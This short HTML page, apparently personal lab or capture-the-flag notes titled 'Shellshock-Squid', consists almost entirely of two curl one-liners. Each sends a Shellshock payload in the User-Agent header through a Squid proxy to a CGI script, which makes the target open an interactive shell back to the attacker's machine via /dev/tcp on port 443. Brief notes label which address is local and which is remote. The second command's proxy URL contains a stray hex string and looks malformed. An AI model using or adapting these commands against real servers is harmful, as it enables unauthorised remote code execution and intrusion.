<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Shellshock-Squid</title>
</head><body>curl -x http://192.168.174.135:3128 -A "() { :; };/bin/sh -i &gt;&amp; /dev/tcp/192.168.174.129/443 0&gt;&amp;1" http://192.168.174.135/cgi-bin/status<br/>
<br/>
<br/>
**192.168.174.135 is the remote address<br/>
<br/>
192.168.174.129 is the local address<br/>
<br/>
192.168.174.135:3128 is the remote address with the proxy port<br/>
<br/>
<br/>
curl -x http://192.168.30.53/7b9713b4d6f4b5edc0875c24b9653cea:3128 -A "() { :; };/bin/sh -i &gt;&amp; /dev/tcp/192.168.30.31/443 0&gt;&amp;1" http://192.168.30.53/cgi-bin/status<br/>
<br/>
<br/>
<br/>
<br/>
</body></html>